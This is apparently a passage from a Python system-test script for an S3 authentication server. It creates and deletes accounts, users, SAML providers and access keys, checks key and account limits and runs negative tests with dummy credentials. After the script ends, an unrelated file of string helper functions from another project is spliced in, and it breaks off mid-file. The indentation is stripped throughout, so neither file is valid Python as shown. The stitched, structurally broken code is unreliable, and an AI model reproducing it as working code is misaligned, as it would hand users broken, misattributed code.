result = AuthTest(test_msg).create_saml_provider(**saml_provider_args).execute_test()
result.command_should_match_pattern(saml_provider_response_pattern)
response_elements = get_response_elements(result.status.stdout)
saml_provider_args['SAMLProviderArn'] = response_elements['SAMLProviderArn']
test_msg = 'Update SAML provider'
saml_provider_args = {}
saml_provider_args['SAMLProviderArn'] = "arn:seagate:iam:::S3IDP"
saml_provider_args['SAMLMetadataDocument'] = metadata_doc_full_path
result = AuthTest(test_msg).update_saml_provider(**saml_provider_args).execute_test()
result.command_response_should_have("SAML provider Updated.")
test_msg = 'List SAML providers'
saml_provider_response_pattern = "ARN = arn:seagate:iam:::S3IDP, ValidUntil = [\S\s]*$"
result = AuthTest(test_msg).list_saml_providers(**saml_provider_args).execute_test()
result.command_should_match_pattern(saml_provider_response_pattern)
test_msg = 'Delete SAML provider'
result = AuthTest(test_msg).delete_saml_provider(**saml_provider_args).execute_test()
result.command_response_should_have("SAML provider deleted.")
test_msg = 'List SAML providers'
result = AuthTest(test_msg).list_saml_providers(**saml_provider_args).execute_test()
result.command_should_match_pattern("")
def get_federation_token_test():
federation_token_args = {}
federation_token_args['Name'] = 's3root'
test_msg = 'Get Federation Token'
response_pattern = "FederatedUserId = [\S]*, AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_federation_token(**federation_token_args).execute_test()
result.command_should_match_pattern(response_pattern)
response_elements = get_response_elements(result.status.stdout)
S3ClientConfig.access_key_id = response_elements['AccessKeyId']
S3ClientConfig.secret_key = response_elements['SecretAccessKey']
S3ClientConfig.token = response_elements['SessionToken']
_use_root_credentials()
test_msg = 'Delete access key'
access_key_args = {}
access_key_args['AccessKeyId'] = response_elements['AccessKeyId']
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3root'
user_args = {}
user_args['UserName'] = "s3root"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
def delete_account_tests():
_use_root_credentials()
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
AuthTest(test_msg).create_user(**user_args).execute_test()\
.command_should_match_pattern(user1_response_pattern)
account_args = {'AccountName': 's3test'}
test_msg = "Delete account s3test should fail"
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("attempted to delete a resource that has attached subordinate entities")
# Test: create an account s3test1 and try to delete account s3test1 using access
# key and secret key of account s3test. Account delete operation should fail.
test_msg = "Create account s3test1"
account_args = {'AccountName': 's3test1', 'Email': 's3test1@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
s3test1_root_access_key = account_response_elements['AccessKeyId']
s3test1_root_secret_key = account_response_elements['SecretKey']
test_msg = "Delete account s3test1 using credentials of account s3test should fail."
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("You are not authorized to perform this operation.")
# Test: delete account s3test with force option [recursively/forcefully]
test_msg = "Delete account s3test"
account_args = {'AccountName': 's3test', 'force': True}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Use invalid access key and secret key of account s3test1
GlobalTestState.root_access_key = "xRZ807dxQEqakueNTBpyNQ#"
GlobalTestState.root_secret_key = "caEE2plJfA1BrhthYsh9H9siEQZtCMF4etvj1o9B"
_use_root_credentials()
# Test: delete account with invalid access key and secret key format
test_msg = "Delete account s3test1 with invalid access key format"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True) \
.command_response_should_have("The AWS access key Id you provided does not exist in our records.")
# Use access key and secret key of account s3test1
GlobalTestState.root_access_key = s3test1_root_access_key
GlobalTestState.root_secret_key = s3test1_root_secret_key
_use_root_credentials()
# Test: delete account without force option
test_msg = "Delete account s3test1"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Test: Account cannot be deleted if it contains some buckets
test_msg = "Create account s3test1"
account_args = {'AccountName': 's3test1', 'Email': 's3test1@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
GlobalTestState.root_access_key = account_response_elements['AccessKeyId']
GlobalTestState.root_secret_key = account_response_elements['SecretKey']
_use_root_credentials()
S3ClientConfig.pathstyle = False
S3cmdTest('s3cmd can create bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.create_bucket("seagatebucket").execute_test().command_is_successful()
test_msg = "Delete account s3test1 containing buckets"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("Account cannot be deleted as it owns some resources.")
S3cmdTest('s3cmd can delete bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.delete_bucket("seagatebucket").execute_test().command_is_successful()
# Test: Account cannot be deleted on motr_idx_op fail
test_msg = "Cannot delete account s3test1 on motr_idx_op fail"
S3fiTest('s3cmd can enable FI motr_idx_op_fail').\
enable_fi("enable", "always", "motr_idx_op_fail").\
execute_test().command_is_successful()
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("Account cannot be deleted")
S3fiTest('s3cmd disable Fault injection').\
disable_fi("motr_idx_op_fail").\
execute_test().command_is_successful()
test_msg = "Delete account s3test1 contains no buckets"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
def reset_account_accesskey_tests():
test_msg = "Create account s3test1"
account_args = {'AccountName': 's3test1', 'Email': 's3test1@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
s3test1_root_access_key = account_response_elements['AccessKeyId']
s3test1_root_secret_key = account_response_elements['SecretKey']
# Use access key and secret key of account s3test1
GlobalTestState.root_access_key = s3test1_root_access_key
GlobalTestState.root_secret_key = s3test1_root_secret_key
_use_root_credentials()
S3ClientConfig.pathstyle = False
# Create a bucket with just now created Account credentials
S3cmdTest('s3cmd can create bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.create_bucket("seagatebucket").execute_test().command_is_successful()
test_msg = "Reset account access key"
account_args = {'AccountName': 's3test1', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).reset_account_accesskey(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
s3test1_root_access_key = account_response_elements['AccessKeyId']
s3test1_root_secret_key = account_response_elements['SecretKey']
test_msg = "Reset account access key with invalid credentials"
account_args = {'AccountName': 's3test1', 'ldapuser': 'sgiamadmin*',
'ldappasswd': 'ldapadmin@'}
result = AuthTest(test_msg).reset_account_accesskey(**account_args).execute_test(negative_case=True)
result.command_should_match_pattern("Account access key wasn't reset.")
# Using the old access key should fail now
S3cmdTest('s3cmd can delete bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.delete_bucket("seagatebucket").execute_test(negative_case=True).command_should_fail().command_error_should_have("")
# Use new access key and secret key of account s3test1
GlobalTestState.root_access_key = s3test1_root_access_key
GlobalTestState.root_secret_key = s3test1_root_secret_key
_use_root_credentials()
# Using new access key should pass now
S3cmdTest('s3cmd can delete bucket').with_credentials(GlobalTestState.root_access_key,
GlobalTestState.root_secret_key) \
.delete_bucket("seagatebucket").execute_test().command_is_successful()
test_msg = "Delete account s3test1"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Limit on maximum number of credentials per account: the count of permanent
# access keys must not exceed two, and temporary credentials must not count
# toward that limit.
# Create account
test_msg = "Create account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "tempAuthTestAccount"
access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
s3test_access_key = S3ClientConfig.access_key_id
s3test_secret_key = S3ClientConfig.secret_key
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
# Create Account LoginProfile for tempAuthTestAccount
test_msg = 'create account login profile should succeed.'
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="tempAuthTestAccount"
user_args['Password'] = "accountpassword"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
date_pattern_for_tempAuthCred = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1])T(2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9].[0-9]*[\+-][0-9]*"
# Get temp auth credentials for the account
access_key_args['Password'] = "accountpassword"
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
# Get temp auth credentials for the account a second time; temporary
# credentials must not count toward the permanent access-key limit.
access_key_args['Password'] = "accountpassword"
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
# Create a second permanent access key; the account now holds the maximum of two.
test_msg = 'Create access key for tempAuthTestAccount'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
# Creating one more permanent access key should fail as the maximum limit has been reached.
test_msg = 'Create access key beyond limit should fail'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("AccessKeyQuotaExceeded")
#Delete account
test_msg = "Delete account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', 'force': True}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = s3test_access_key
S3ClientConfig.secret_key = s3test_secret_key
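# Health check: a HEAD request against /auth/health should return 200 OK.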
def auth_health_check_tests():
# e.g. curl -s -I -X HEAD https://iam.seagate.com:9443/auth/health
health_check_uri = "/auth/health"
result = AuthTest('Auth server health check').get_auth_health(health_check_uri).\
execute_test().command_is_successful().command_response_should_have("200 OK")
# Validate maxAccount and maxUser limit values from authserver.properties file
def test_max_account_and_user_limit_value_of_auth_config():
print("Updating autherver.properties (/opt/seagate/cortx/auth/resources/authserver.properties) file with test values..")
s3confstore = S3CortxConfStore('properties:///opt/seagate/cortx/auth/resources/authserver.properties', 'index')
old_maxAccountValue=s3confstore.get_config('maxAccountLimit')
old_maxIAMUserValue=s3confstore.get_config('maxIAMUserLimit')
s3confstore.set_config('maxAccountLimit', '1', True)
s3confstore.set_config('maxIAMUserLimit', '1', True)
os.system('systemctl restart s3authserver')
time.sleep(1) # sometimes the authserver needs extra time to restart
print("auth config values are changed successfully..")
# Try to create two accounts; the second should fail with a MaxAccountLimitExceeded error.
test_msg = "Create account authconfigValidatorAccount1 should succeed."
account_args = {'AccountName': 'authconfigValidatorAccount1', 'Email': 'authconfigValidatorAccount1@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "authconfigValidatorAccount1"
access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
test_msg = "Create account authconfigValidatorAccount2 should fail with MaxAccountLimitExceeded with limit as 1."
account_args = {'AccountName': 'authconfigValidatorAccount2', 'Email': 'authconfigValidatorAccount2@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("MaxAccountLimitExceeded")
test_access_key = S3ClientConfig.access_key_id
test_secret_key = S3ClientConfig.secret_key
# Test IAM User limit
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
test_msg = "Create User s3user1 in authconfigValidatorAccount1 should successful."
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
AuthTest(test_msg).create_user(**user_args).execute_test()\
.command_should_match_pattern(user1_response_pattern)
test_msg = "Create User s3user2 in authconfigValidatorAccount1 should fail with MaxUserLimitExceeded with limit as 1."
user_args = {'UserName': 's3user2'}
AuthTest(test_msg).create_user(**user_args).execute_test(negative_case=True)\
.command_response_should_have("MaxUserLimitExceeded")
# Cleanup: delete the IAM user
test_msg = "Delete User s3user1 should succeed."
user_args = {}
user_args['UserName'] = "s3user1"
AuthTest(test_msg).delete_user(**user_args).execute_test()\
.command_response_should_have("User deleted.")
# Delete account
test_msg = 'Delete Account should succeed.'
account_args = {}
account_args['AccountName'] = access_key_args['AccountName']
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Restore config parameters
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
s3confstore.set_config('maxAccountLimit', old_maxAccountValue, True)
s3confstore.set_config('maxIAMUserLimit', old_maxIAMUserValue, True)
os.system('systemctl restart s3authserver')
time.sleep(1) # sometimes the authserver needs extra time to restart
print("Reverted authserver.properties (/opt/seagate/cortx/auth/resources/authserver.properties) to its original values successfully...")
# Validate delete account functionality with ldap credentials
def delete_acc_ldap_cred_tests():
# DeleteAccount with ldap credentials tests -- starts
test_access_key = S3ClientConfig.access_key_id
test_secret_key = S3ClientConfig.secret_key
test_msg = "Create account s3deletetest for testing Account Deletion with ldap credentials"
account_args = {'AccountName': 's3deletetest', 'Email': 's3deletetest@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
AuthTest(test_msg).create_account(**account_args).execute_test()\
.command_should_match_pattern(account_response_pattern)
test_msg = 'DeleteAccount should fail with InvalidAccessKeyId error with wrong ldapadmin username i.e. dummyUser'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = "dummyUser"
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("InvalidAccessKeyId")
test_msg = 'DeleteAccount should fail with InvalidAccessKeyId error with empty ldapadmin username'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = ""
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("InvalidAccessKeyId")
test_msg = 'DeleteAccount should fail with SignatureDoesNotMatch error with invalid ldappassword i.e. dummykey'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = "dummykey"
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("SignatureDoesNotMatch")
test_msg = 'DeleteAccount should fail with SignatureDoesNotMatch error with empty ldappassword'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = ""
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("SignatureDoesNotMatch")
test_msg = 'DeleteAccount successful with ldap credentials'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
ldap_user_name = S3ClientConfig.ldapuser
ldap_user_passwd = S3ClientConfig.ldappasswd
test_msg = "Create account s3deletetest1 for testing Account Deletion scnearios with ldap credentials"
account_args = {'AccountName': 's3deletetest1', 'Email': 's3deletetest@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()\
.command_should_match_pattern(account_response_pattern)
response_elements = get_response_elements(result.status.stdout)
accesskey = response_elements['AccessKeyId']
secretkey = response_elements['SecretKey']
os.environ["AWS_ACCESS_KEY_ID"] = accesskey
os.environ["AWS_SECRET_ACCESS_KEY"] = secretkey
AwsTest('Aws can create bucket').create_bucket("tbucket").execute_test().command_is_successful()
test_msg = 'DeleteAccount should fail with AccountNotEmpty error with ldap credentials'
account_args = {}
account_args['AccountName'] ="s3deletetest1"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("AccountNotEmpty")
S3ClientConfig.access_key_id = accesskey
S3ClientConfig.secret_key = secretkey
# Delete bucket with account access key
AwsTest('Aws can delete bucket').delete_bucket("tbucket").execute_test().command_is_successful()
# create IAM User and try to delete account
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
# Try to delete account
test_msg = 'DeleteAccount should fail with DeleteConflict error with ldap credentials when an IAM user exists as a sub-resource'
account_args = {}
account_args['AccountName'] ="s3deletetest1"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("DeleteConflict")
S3ClientConfig.access_key_id = accesskey
S3ClientConfig.secret_key = secretkey
test_msg = 'Delete User s3user1'
user_args = {}
user_args['UserName'] = "s3user1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'DeleteAccount successful with ldap credentials'
account_args = {}
account_args['AccountName'] ="s3deletetest1"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# DeleteAccount fail if account has bucket/iam-users -- end
# Restore config parameters
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
S3ClientConfig.ldapuser = ldap_user_name
S3ClientConfig.ldappasswd = ldap_user_passwd
del os.environ["AWS_ACCESS_KEY_ID"]
del os.environ["AWS_SECRET_ACCESS_KEY"]
# DeleteAccount fails with IAM credentials/temp auth credentials of IAM User --- start
date_pattern_for_tempAuthCred = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1])T(2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9].[0-9]*[\+-][0-9]*"
test_msg = "Create account tempAuthDeleteAccount"
account_args = {'AccountName': 'tempAuthDeleteAccount', 'Email': 'tempAuthDeleteAccount@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result1.status.stdout)
acc_access_key_args = {}
acc_access_key_args['AccountName'] = "tempAuthDeleteAccount"
acc_access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
acc_access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is s3user1) using account credentials.'
accesskey_response_elements = {}
iam_access_key_args = {}
iam_access_key_args['UserName'] = 's3user1'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**iam_access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
iam_access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
iam_access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
# Test DeleteAccount should fail with IAM user credentials
test_msg = 'DeleteAccount tempAuthDeleteAccount should fail with InvalidUser error with IAM user access key'
account_args = {}
account_args['AccountName'] ="tempAuthDeleteAccount"
S3ClientConfig.access_key_id = iam_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = iam_access_key_args['SecretAccessKey']
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("InvalidUser")
date_pattern = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1]) (2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9][\+-][0-9]*:[0-9]*"
test_msg = 'Create UserLoginProfile for user s3user1 should succeed.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="s3user1"
user_args['Password'] ="abcdefg"
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
login_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
#Get Temp Auth Credentials for IAM user s3user1
user_access_key_args = {}
user_args['AccountName'] = acc_access_key_args['AccountName']
test_msg = 'Generate GetTempAuthCredentials for IAM User s3user1'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**user_args).execute_test()
result.command_should_match_pattern(response_pattern)
response_elements = get_response_elements(result.status.stdout)
user_access_key_args['AccessKeyId'] = response_elements['AccessKeyId']
user_access_key_args['SecretAccessKey'] = response_elements['SecretAccessKey']
user_access_key_args['SessionToken'] = response_elements['SessionToken']
# Test DeleteAccount with IAM user temp credentials should fail.
test_msg = 'DeleteAccount should fail with InvalidUser error when using IAM user temporary credentials'
account_args = {}
account_args['AccountName'] =acc_access_key_args['AccountName']
S3ClientConfig.access_key_id = user_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = user_access_key_args['SecretAccessKey']
S3ClientConfig.token = user_access_key_args['SessionToken']
result = AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidUser")
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
test_msg = "Delete IAM user's temporary access key for s3user1 should succeed."
user_access_key_args['userName'] = iam_access_key_args['UserName']
result = AuthTest(test_msg).delete_access_key(**user_access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = "Delete IAM user's access key for s3user1 should succeed."
user_access_key_args['AccessKeyId'] = iam_access_key_args['AccessKeyId']
S3ClientConfig.token = ""
result = AuthTest(test_msg).delete_access_key(**user_access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3user1 using account credentials should succeed.'
user_args = {}
user_args['UserName'] = iam_access_key_args['UserName']
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
# Verify that DeleteAccount now succeeds.
test_msg = 'DeleteAccount successful with ldap credentials'
account_args = {}
account_args['AccountName'] =acc_access_key_args['AccountName']
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# DeleteAccount fails with IAM credentials/temp auth credentials of IAM User --- end
# Restore config parameters
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
S3ClientConfig.ldapuser = ldap_user_name
S3ClientConfig.ldappasswd = ldap_user_passwd
def execute_all_system_tests():
if Config.no_ssl :
print('Executing auth system tests over HTTP connection')
else:
print('Executing auth system tests over HTTPS connection')
# Do not change the order.
before_all()
test_max_account_and_user_limit_value_of_auth_config()
account_tests()
user_tests()
accesskey_tests()
role_tests()
saml_provider_tests()
get_federation_token_test()
delete_account_tests()
reset_account_accesskey_tests()
auth_health_check_tests()
delete_acc_ldap_cred_tests()
if __name__ == '__main__':
execute_all_system_tests()
# translator/functions.py (SDM-TIB/FunMap, Apache-2.0)
import re
import csv
import sys
import os
import pandas as pd
global columns
columns = {}
# returns a string in lower case
def tolower(value):
return value.lower()
# return a string in upper case
def toupper(value):
return value.upper()
# return a string in title case
def totitle(value):
return value.title()
# return a string after removing leading and trailing whitespaces
def trim(value):
return value.strip()
# return a string with all occurrences of toremove removed
def chomp(value, toremove):
return value.replace(toremove, '')
# return the substring value[index1:index2] (index2 may be None or negative)
def substring(value, index1, index2):
if index2 is None:
return value[int(index1):]
else:
return value[int(index1):int(index2)]
# replace occurrences of value2 with value3
def replaceValue(value, value2, value3):
return value.replace(value2, value3)
# return the first match of the regex in value (raises TypeError if there is no match)
def match(value, regex):
return re.match(regex, value)[0]
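# Build a variant identifier: prefix + <column2 stem before the first "_">
# + "_" + <column1 with the "c." prefix dropped and ">" mapped to "~">;
# returns an empty string when column1 is NaN.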
def variantIdentifier(column1, column2,prefix):
value = ""
if (str(column1) != "nan"):
value = re.sub('_.*','',str(column2))+"_"+str(column1).replace("c.","").replace(">", "~")
value = prefix+value
return value
# returns conditionally a certain string
